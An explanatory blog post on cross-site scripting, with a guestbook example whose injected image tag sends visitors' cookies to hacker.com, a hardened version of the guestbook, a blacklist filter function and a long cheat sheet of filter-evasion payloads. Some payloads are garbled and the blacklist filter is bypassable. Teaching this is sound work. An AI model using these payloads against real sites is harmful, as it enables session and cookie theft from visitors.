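1. Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is one of the vulnerabilities most commonly found in web applications. It allows someone other than the site administrator to insert malicious script into a web page. It is usually carried out by posting a message containing malicious script to a bulletin board that many users read. The vulnerability arises when a web application uses values received from users without properly validating them. With it, a hacker can steal user information (cookies, sessions, etc.) or cause abnormal functions to be carried out automatically. It is called cross-site scripting because it mainly works by exchanging information with another website.
- Occurs when input validation is not performed properly
- Unlike other web hacking techniques, it targets the users who visit the site rather than the website itself
- Executes arbitrary HTML tags, JavaScript, or VBScript in the targeted user's web browser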
2. Example
Suppose there is a guestbook program that outputs what the user entered, as follows.
```php
<p><?php echo htmlspecialchars($name); ?>님의 말: </p>
<?php echo $content; ?>
```
Suppose $name is "Hacker" and $content is the following.
```html
<p>Hello! I am a hacker.</p>
<img src="#" width="0" height="0" onerror="this.src='http://hacker.com/gatherCookie.php?cookie='+encodeURIComponent(document.cookie);" />
```
The page will then be output as follows.
```html
<p>Hacker님의 말: </p>
<p>Hello! I am a hacker.</p>
<img src="#" width="0" height="0" onerror="this.src='http://hacker.com/gatherCookie.php?cookie='+encodeURIComponent(document.cookie);" />
```
As a result, the cookies of anyone who views the guestbook will be sent to the hacker.
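The guestbook above in hardened form, as an added example that is not part of the original post: both fields are HTML-encoded on output, the session cookie is marked HttpOnly so it is not readable through document.cookie, and a Content-Security-Policy header disallows inline handlers. The helper names h() and render_entry(), the policy values, and the assumption that the site is served over HTTPS are illustrative.

```php
<?php
// Added example (not from the original post): hardened guestbook output.

// Encode for an HTML text or attribute context; ENT_QUOTES also encodes ' and ".
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: render one entry with BOTH fields encoded,
// unlike the original template, which echoed $content unencoded.
function render_entry(string $name, string $content): string {
    return '<p>' . h($name) . '님의 말: </p>' . "\n"
         . '<p>' . nl2br(h($content)) . '</p>' . "\n";
}

// Response hardening; skipped on the CLI, where no headers are sent.
if (PHP_SAPI !== 'cli') {
    // HttpOnly keeps the session cookie out of document.cookie.
    // 'secure' assumes the site is served over HTTPS (PHP 7.3+ array form).
    session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
    session_start();
    // Without 'unsafe-inline', inline event handlers such as onerror do not run.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Constructed sample input: the $name and $content values from the example above.
$name = 'Hacker';
$content = '<p>Hello! I am a hacker.</p>' . "\n"
         . '<img src="#" width="0" height="0" onerror="this.src=\'http://hacker.com/gatherCookie.php?cookie=\'+encodeURIComponent(document.cookie);" />';

// The markup is emitted as &lt;img ... &gt; text, so the browser displays it
// instead of parsing it as an element with an event handler.
echo render_entry($name, $content);
```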
3. Reference
A simple HTML filtering function for PHP
```php
<?php
function html_filter($content)
{
    // Strip bad elements: escape the "<" that opens any blacklisted tag.
    $content = preg_replace('/(<)(|\/)(\!|\?|html|head|title|meta|body|style|link|base|script'.
        '|frameset|frame|noframes|iframe|applet|embed|object|param|noscript|noembed|map|area|basefont|xmp|plaintext|comment)/i', '&lt;$2$3', $content);

    // Strip script handlers: replace the "o" of "on..." with a character
    // reference so names such as onerror no longer parse as event handlers.
    $content = preg_replace_callback("/([^a-z])(o)(n)/i",
        // Closure instead of create_function(), which PHP 8 no longer provides.
        function ($matches) {
            $matches[2] = ($matches[2] == "o") ? "&#111;" : "&#79;";
            return $matches[1].$matches[2].$matches[3];
        }, $content);

    return $content;
}
?>
```
4. Cheat Sheet
1) <img> tags
Input |
Description |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
No Filter Evasion |
<IMG SRC="javascript:alert('XSS');"> |
Image XSS using the JavaScript directive |
<IMG SRC=javascript:alert('XSS')> |
No quotes and no semicolon |
<IMG SRC=JaVaScRiPt:alert('XSS')> |
Case insensitive XSS attack vector |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
Malformed IMG tags |
<IMG SRC=# onmouseover="alert('xxs')"> |
Default SRC tag to get past filters |
<IMG SRC= onmouseover="alert('xxs')"> |
Default SRC tag by leaving it empty |
<IMG onmouseover="alert('xxs')"> |
Default SRC tag by leaving it out entirely |
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> |
On error alert |
<img src=x onerror="javas cript:a lert('X SS')"> | IMG onerror and javascript alert encode |
<IMG SRC=javasc ript:al ert('XS S')> | Decimal HTML character references without trailing semicolons |
<IMG SRC=javascript: alert('XSS')> | Hexadecimal HTML character references without trailing semicolons |
<IMG SRC="jav ascript:alert('XSS');"> | Embedded tab |
<IMG SRC="jav	ascript:alert('XSS');"> | Embedded Encoded tab |
<IMG SRC="jav
ascript:alert('XSS');"> | Embedded newline to break up XSS |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | Null breaks up JavaScript directive |
<IMG SRC="  javascript:alert('XSS');"> | Spaces and meta chars before the JavaScript |
<IMG SRC="javascript:alert('XSS')" | Half open HTML/JavaScript XSS vector |
<IMG DYNSRC="javascript:alert('XSS')"> | IMG Dynsrc |
<IMG LOWSRC="javascript:alert('XSS')"> | IMG lowsrc |
<IMG SRC='vbscript:msgbox("XSS")'> | VBscript in an image |
<IMG SRC="livescript:[code]"> | Livescript (older versions of Netscape only) |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | IMG Embedded commands |
2) <styles> tags
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
STYLE sheet |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> |
Remote style sheet |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
Remote style sheet part 2 |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> |
Remote style sheet part 3 |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | Remote style sheet part 4 |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | STYLE tags with broken up JavaScript for XSS |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | STYLE attribute using a comment to break up expression |
exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | IMG STYLE with expression |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | STYLE tag (Older versions of Netscape only) |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | STYLE tag using background-image |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | STYLE tag using background |
<XSS STYLE="xss:expression(alert('XSS'))"> | Anonymous HTML with STYLE attribute |
<XSS STYLE="behavior: url(xss.htc);"> | Local htc file |
3) <div> tags
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
DIV |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a |
DIV background-image with unicoded XSS exploit |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
DIV background-image plus extra characters |
<DIV STYLE="width: expression(alert('XSS'));"> |
DIV expression |
4) <iframe> tags, <table> tags
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
IFRAME |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
IFRAME Event based |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
FRAME |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
TABLE |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> |
TD |
5) <meta> tags
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
META |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> |
META using data |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> |
META with additional URL parameter |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
IMG Embedded commands part II |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
Cookie manipulation |
6) ETC.
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
Non-alpha-non-digit XSS |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
|
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
|
<<SCRIPT>alert("XSS");//<</SCRIPT> |
Extraneous open brackets |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > |
No closing script tags |
<SCRIPT SRC=//ha.ckers.org/.j> |
Protocol resolution in script tags |
<iframe src=http://ha.ckers.org/scriptlet.html < |
Double open angle brackets |
\";alert('XSS');// |
Escaping JavaScript escapes |
</script><script>alert('XSS');</script> |
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | End title tag |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | INPUT image |
<BODY BACKGROUND="javascript:alert('XSS')"> | BODY image |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE> <UL><LI>XSS</br> | List-style-image |
<svg/onload=alert('XSS')> | SVG object tag |
<BODY ONLOAD=alert('XSS')> | BODY tag |
<BGSOUND SRC="javascript:alert('XSS');"> | BGSOUND |
<BR SIZE="&{alert('XSS')}"> | & JavaScript includes |
¼script¾alert(¢XSS¢)¼/script¾ | US-ASCII encoding |
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> | Downlevel-Hidden block |
<BASE HREF="javascript:alert('XSS');//"> | BASE tag |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | OBJECT tag |
a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); | Using ActionScript inside flash can obfuscate your XSS vector |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"> </B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"> </SPAN> | XML data island with CDATA obfuscation |
<XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | Locally hosted XML with embedded JavaScript that is generated using an XML data island |
<HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS <SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> | HTML+TIME in XML |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | Assuming you can only fit in a few characters and it filters against ".js" |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | SSI (Server Side Includes) |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS'); +ADw-/SCRIPT+AD4- | UTF-7 encoding |
<SCRIPT a=">" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | XSS using HTML quote encapsulation |
<SCRIPT =">" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | You can EMBED SVG which can contain your XSS vector |
7) Character escape sequences
This post was written based on content from Wikipedia and OWASP.